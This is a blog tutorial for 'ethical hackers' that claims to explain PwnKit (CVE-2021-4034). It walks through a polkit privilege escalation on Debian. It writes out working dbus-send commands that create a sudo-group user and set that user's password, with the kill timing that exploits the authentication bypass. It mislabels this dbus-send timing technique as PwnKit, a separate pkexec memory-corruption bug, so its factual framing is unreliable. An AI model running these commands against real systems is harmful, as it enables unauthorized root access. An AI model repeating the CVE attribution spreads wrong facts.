Posted on

PwnKit : Explained with POC

Hello aspiring ethical hackers. In this article, you will learn how to use PwnKit to elevate privileges on a Linux system. But first things first. What exactly is polkit?

Polkit is a component that controls system-wide privileges in Unix-like operating systems. Put simply, it provides an organized way for non-privileged processes in Linux to communicate with privileged processes. Known earlier as PolicyKit, it’s name was changed to polkit since version 0.105 which was released in April 2012 to emphasize the rewritten component and changed API.

In Linux, you use SUDO to usually execute commands with privileges of a root user. However, it can also be done with polkit by using command pkexec. But the fact is SUDO is more preferred as it is more easily configurable.

So how is this polkit exploited to elevate privileges on a Linux system. A memory corruption vulnerability PwnKit (CVE-2021-4034) was discovered in the pkexec command (which is installed on all major Linux distributions). The vulnerability is present in polkit since the original release of 2009.

The vulnerable targets include but may not be limited to Red Hat 8, Fedora 21, Debian Testing ‘Bullseye” and Ubuntu 20.04. Most of the systems would have now received patches but any OS with no updates should still be vulnerable.

The version of polkit installed can be checked as shown below.

We are testing it on Debian Testing 11.2 (BullsEye). There is another command apart from “pkexec” to interact with polkit from the command line. It is “dbus-send”. It is a general purpose tool used mainly for testing but installed by default on systems that use D-Bus. For example, on a Linux system, D-Bus can be used to create a new user named “hackercool” as shown below.

dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hackercool string:”blackhat Account” int32:1

This is as simple as that. This command will manually send a dbus message to the accounts daemon to create a new user named “hackercool” with a description of “blackhat Account” and will make the new user a member of SUDO group (as we set the int32:1 flag). Then all that’s left is setting the password to the newly created user.

But before we do any of this, we need to check the time taken to run the above command? This can be done by prepending the time command to the above command as shown below.

It takes almost 7 seconds to execute this command. But wait, why do we need to check the time taken to execute this command? Because we have to kill it at the correct time. Once again why we need to kill it? Well, here’s the answer.

When you run the above command (without time) and terminate it after some time and then polkit asks dbus-daemon for the connection, dbus-daemon correctly returns an error. Here’s where polkit goes wrong. Instead of rejecting the request it treats the request as it came from root process and viola we have an authentication bypass.

However, the timing of the vulnerability is very difficult to detect. Hence we need to kill the command after over half time. Why? it seems polkit asks d-bus daemon for the terminated connection multiple times on different codepaths. Almost all the codepaths handle it correctly except one. We are looking for this one codepath. So if we terminate the command early, privilege escalation may not work correctly.

I hope everything is explained. Now, let’s get into practical exploitation. So what I want to do is run the same command as we ran above to create a new user named “hackercool” but this time killing the process after 5 seconds. As the command takes 7 seconds to complete, I have chosen to terminate this command after 5 seconds. i.e almost more than half time.

As you can see in the image below, a new user named “hackercool” is created and added into SUDO group.

Now, all we have to do is create a password for this user. Note that we have to create a SHA-512 hash. This can be done using OPenssl. Once the hash is created use the dbus-send command once again but this time to create the password for this newly created user. This can be done as shown below.

dbus-send –system –dest=org.freedesktop.Accounts –type=method_call –print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'<SHA-512 HAsh’ string:’Ask the pentester’ & sleep 5s; kill $!

It’s done. Let’s login as the new user.

As you can see, we successfully elevated privileges on a target system by creating a new user. To learn Real World Ethical Hacking, Please subscribe to our Monthly Magazine.